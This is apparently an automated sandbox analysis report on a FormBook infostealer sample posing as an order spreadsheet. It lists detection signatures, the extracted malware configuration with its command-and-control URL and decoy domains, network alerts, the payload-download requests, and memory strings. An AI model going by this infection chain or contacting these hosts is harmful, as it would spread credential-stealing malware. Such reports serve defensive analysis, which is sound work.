Windows Analysis Report
RFQ Order PT502818.xls.vbs

Overview

General Information

Sample name: RFQ Order PT502818.xls.vbs
Analysis ID: 1649124
MD5: 2bd4b9968087610996ce5ebf4d54daf7
SHA1: 765b890da74d5abefcee81d348eca4b02532bb63
SHA256: bd3a12a40c2387cebef93cb3030ebcf879e43683424069898e5a0053100787fa
Tags: Formbookvbsuser-abuse_ch
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected Powershell download and execute
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Cscript/Wscript Uncommon Script Extension Execution
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses an obfuscated file name to hide its real file extension (double extension)
Uses netsh to modify the Windows network and firewall settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://www.ecommerce-25754.bond Avira URL Cloud: Label: malware
Source: https://ofice365.github.io/1/test.jpg09 Avira URL Cloud: Label: malware
Source: http://www.ecommerce-25754.bond/mtpi/ Avira URL Cloud: Label: malware
Source: http://www.ocgccv.info/mtpi/www.cameronreitsma.net Avira URL Cloud: Label: malware
Source: http://www.ocgccv.info/mtpi/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.cameronreitsma.net/mtpi/"], "decoy": ["jpsjlpszv1emibow.cyou", "iyfeszfot8zdkmkb.cyou", "adutils-e2e-test3-4357742.zone", "protecttech.shop", "atneb.autos", "exclusivepiscinas.net", "jan-aadhaar.shop", "absorbalineraquatic.cloud", "warehouse-092.today", "authme.now", "lekido.tech", "etimestrips.store", "astilbeastiteaubades.cloud", "5335588a59.buzz", "nw01erf.pro", "tokenpool.xyz", "b2cstore.net", "emiuniv.online", "yylmhzt.xyz", "jessicabyheart.store", "031235131.xyz", "hopeclothing.shop", "aureliussoft.net", "testimonial.buzz", "pemimpi.xyz", "ayagabi.info", "kkk17.yachts", "251014.pink", "car-select.online", "warehouse-jobs-67806.bond", "hodl365.xyz", "woodenhandicrafts.shop", "ocgccv.info", "truow.life", "liga200.sbs", "swkxxkhx883ebi8i.xyz", "88z1.fun", "estatelawyers8.xyz", "pokomampollanracial.cloud", "ayap.xyz", "omewealth.shop", "polaceres4d.xyz", "menopausemarketing.pro", "mobile-homes80.shop", "hcywyj10.xyz", "6614.bid", "topbitcoin.xyz", "joker878.live", "goodelectronics.club", "mzwdg.autos", "gamefipayment.xyz", "afrowears.store", "ebsymptomsandtreatment.today", "p6y5m.skin", "wyndown.net", "41883.ltd", "ecommerce-25754.bond", "23461.bid", "play-rikvip.club", "focusmentorn.pro", "holymountain.xyz", "cbvu.autos", "tires-nl-1428.today", "btvjirz612.vip"]}
Multi AV Scanner detection for submitted file
Source: RFQ Order PT502818.xls.vbs Virustotal: Detection: 13% Perma Link
Yara detected FormBook
Source: Yara match File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2654798948.0000000000CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1641106278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654692262.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2654885406.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 100.0%
Source: unknown HTTPS traffic detected: 185.199.109.153:443 -> 192.168.2.4:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 16.15.192.227:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: Binary string: netsh.pdb source: RegAsm.exe, 00000006.00000002.1654119281.0000000003030000.00000040.10000000.00040000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.000000000149A000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000002.2654921353.0000000000E30000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: RegAsm.exe, 00000006.00000002.1654119281.0000000003030000.00000040.10000000.00040000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.00000000014C1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1644030200.000000000149A000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2654921353.0000000000E30000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000006.00000002.1656803800.0000000003090000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.1641084267.000000000314E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.1643019869.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.000000000363E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: explorer.exe, 00000007.00000002.2670125824.0000000010F8F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2656472532.00000000039EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2655145082.0000000002F46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000006.00000002.1656803800.0000000003090000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000008.00000003.1641084267.000000000314E000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000003.1643019869.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.000000000363E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000008.00000002.2655735535.00000000034A0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: explorer.exe, 00000007.00000002.2670125824.0000000010F8F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2656472532.00000000039EF000.00000004.10000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.2655145082.0000000002F46000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 4x nop then pop ebx 6_2_00407B23
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop ebx 8_2_00B07B23

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49725 -> 154.198.239.29:80
Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49725 -> 154.198.239.29:80
Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49725 -> 154.198.239.29:80
Source: Network traffic Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49727 -> 91.195.240.19:80
Source: Network traffic Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49727 -> 91.195.240.19:80
Source: Network traffic Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49727 -> 91.195.240.19:80
Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.109.153:443 -> 192.168.2.4:49715
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.19 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 154.198.239.29 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.cameronreitsma.net/mtpi/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /1/test.jpg HTTP/1.1Host: ofice365.github.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ebgApAm.txt HTTP/1.1Host: leka25.s3.us-east-1.amazonaws.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mtpi/?wR=LDlZA8c8ccZsWXrHXJy43Rqas/rkEJBbKG585dTsIiDnmU9iwQgUnyEkHdWjaY+U5WHy&V4=jDKdPfM0e HTTP/1.1Host: www.nw01erf.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mtpi/?wR=WpZS+bw4JXH0y118vk5hQTOL+1r6bbOHRTASiZs1K9uS3ePifMNiBK1a8R3amt8aiouh&V4=jDKdPfM0e HTTP/1.1Host: www.menopausemarketing.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.199.109.153 185.199.109.153
Source: Joe Sandbox View IP Address: 185.199.109.153 185.199.109.153
Source: Joe Sandbox View IP Address: 91.195.240.19 91.195.240.19
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNSERVERSUS CNSERVERSUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E3F82 getaddrinfo,setsockopt,recv, 7_2_0F3E3F82
Source: global traffic HTTP traffic detected: GET /1/test.jpg HTTP/1.1Host: ofice365.github.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ebgApAm.txt HTTP/1.1Host: leka25.s3.us-east-1.amazonaws.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mtpi/?wR=LDlZA8c8ccZsWXrHXJy43Rqas/rkEJBbKG585dTsIiDnmU9iwQgUnyEkHdWjaY+U5WHy&V4=jDKdPfM0e HTTP/1.1Host: www.nw01erf.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /mtpi/?wR=WpZS+bw4JXH0y118vk5hQTOL+1r6bbOHRTASiZs1K9uS3ePifMNiBK1a8R3amt8aiouh&V4=jDKdPfM0e HTTP/1.1Host: www.menopausemarketing.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic DNS traffic detected: DNS query: ofice365.github.io
Source: global traffic DNS traffic detected: DNS query: leka25.s3.us-east-1.amazonaws.com
Source: global traffic DNS traffic detected: DNS query: www.nw01erf.pro
Source: global traffic DNS traffic detected: DNS query: www.hopeclothing.shop
Source: global traffic DNS traffic detected: DNS query: www.menopausemarketing.pro
Source: global traffic DNS traffic detected: DNS query: www.etimestrips.store
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: explorer.exe, 00000007.00000000.1523845606.0000000009B49000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1523845606.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071685840.0000000009B66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: explorer.exe, 00000007.00000000.1523845606.0000000009B49000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1523845606.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071685840.0000000009B66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000007.00000000.1523845606.0000000009B49000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1523845606.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009B25000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071685840.0000000009B66000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009B49000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000007.00000000.1523845606.0000000009B06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072108638.0000000009B06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2662764839.0000000009B06000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: powershell.exe, 00000003.00000002.1517714752.000002B59E2B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000007.00000002.2662578656.00000000097F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2661830719.0000000008A60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2660742017.00000000081B0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000001.00000002.1815974500.000001A600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1517714752.000002B59E091000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.23461.bid
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.23461.bid/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.23461.bid/mtpi/www.jpsjlpszv1emibow.cyou
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.23461.bidReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afrowears.store
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afrowears.store/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afrowears.store/mtpi/www.tokenpool.xyz
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.afrowears.storeReferer:
Source: powershell.exe, 00000003.00000002.1517714752.000002B59E2B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.btvjirz612.vip
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.btvjirz612.vip/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.btvjirz612.vip/mtpi/www.lekido.tech
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.btvjirz612.vipReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.cameronreitsma.net
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.cameronreitsma.net/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.cameronreitsma.net/mtpi/www.emiuniv.online
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.cameronreitsma.netReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecommerce-25754.bond
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecommerce-25754.bond/mtpi/
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecommerce-25754.bond/mtpi/www.btvjirz612.vip
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ecommerce-25754.bondReferer:
Source: explorer.exe, 00000007.00000003.2071160029.000000000CF36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2072954364.000000000D072000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2071543503.000000000D05A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2669098163.000000000D099000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2073007519.000000000D098000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.emiuniv.online
